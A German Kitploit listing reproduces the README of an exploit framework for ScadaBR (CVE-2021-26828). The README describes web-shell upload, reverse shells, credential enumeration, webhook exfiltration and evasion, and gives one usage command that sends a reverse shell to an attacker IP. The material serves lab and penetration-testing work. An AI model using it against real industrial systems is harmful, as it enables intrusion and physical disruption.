Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Authentifiziertes RCE-Exploit-Framework für ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Tools/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Payload-GenerierungSchwachstellenanalyseExploitationSCADA/ICS-SicherheitWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsCommand and ControlRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare Authentifiziertes RCE-Exploit-Framework für ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

59vor 9 MonatenNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ScadaFlare - Toolkit für authentifizierte RCE-Ausnutzung (CVE-2021-26828)

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Ein modularer Post-Auth-RCE-Exploit, der auf ScadaBR <1.1.0 abzielt und für Red-Team-Einsätze erweitert wurde.

ScadaFlare Demo

Funktionen

  • Lädt eine waffenisierte .jsp-Shell über view_edit.shtm hoch
  • Unterstützt Linux- & Windows-Payloads
  • SOCKS5-/HTTP-Proxy-Unterstützung
  • Reverse-Shell-Auslöser (Standard oder Base64)
  • Enumerations-Module (DB, Zugangsdaten, Log4Shell usw.)
  • Webhook-Exfiltration (Slack / Discord)
  • Generierung von Metasploit-Ressourcenskripten
  • Cleanup-Unterstützung (Kill Switch)
  • Zuordnung zu MITRE-ATT&CK-Techniken

    PhaseTechnikID
    Erster Zugriff (nach Authentifizierung)Valid AccountsT1078
    AusführungExploit Public-Facing ApplicationT1190
    BefehlsausführungWeb ShellT1505.003
    BerechtigungsaktionenModify Web ContentT1505
    Zugriff auf AnmeldedatenCredential in Configuration FilesT1552.001
    ErkundungRemote System DiscoveryT1018
    ExfiltrationExfiltration Over Web ServiceT1567.002
    Umgehung der VerteidigungProxy & Protocol TunnelingT1090

    CVE

    • CVE-2021-26828
    • Entdeckt von Fellipe Oliveira
    • Exploit verbessert & modularisiert

    Warum dieses Tool existiert

    Dieser Exploit wurde während der Analyse des HTB-Pro-Lab-Szenarios „Alchemy“ entwickelt. Der ursprüngliche PoC von Fellipe Oliveira war solide, aber:

    In Python 2 geschrieben

    Es fehlten moderne Funktionen wie Proxy-Unterstützung, Shell-Cleanup und Enumerations-Verkettung

    Er war schwer zu erweitern oder in Red-Team-Workflows zu integrieren

    Diese Version, ScadaFlare, ist eine vollständige Neufassung in Python 3 mit modularer Unterstützung, mehreren Evasions-Strategien, OS-Erkennungs-Override, Webhook-Integration, SOCKS-Proxy-Unterstützung und Enumerations-Ketten für den praktischen Einsatz durch Operatoren.

    Verwendung

    root@kitploit:~
    python3 scadaflare.py http://172.16.0.20:80 admin admin \
      --reverse-ip 10.10.14.44 --reverse-port 4445 \
      --verbose --cleanup
    

    Nur für legale und ethische Nutzung

    ScadaFlare ist ausschließlich konzipiert für:

    • Ausbildung im ethischen Hacking
    • Tests in SCADA-Laboren
    • Defensive Forschung & Schwachstellenvalidierung

    Unbefugte Nutzung gegen reale industrielle Systeme kann:

    • Physische Prozesse stören
    • Schäden oder Sicherheitsgefahren verursachen
    • Zu schwerwiegenden rechtlichen Konsequenzen führen

    Durch die Nutzung dieses Tools übernehmen Sie die volle Verantwortung für:

    • Das Einholen ausdrücklicher schriftlicher Genehmigungen
    • Das ausschließliche Arbeiten in genehmigten Umgebungen

    Lizenz

    MIT-Lizenz – siehe LICENSE

    Tool herunterladen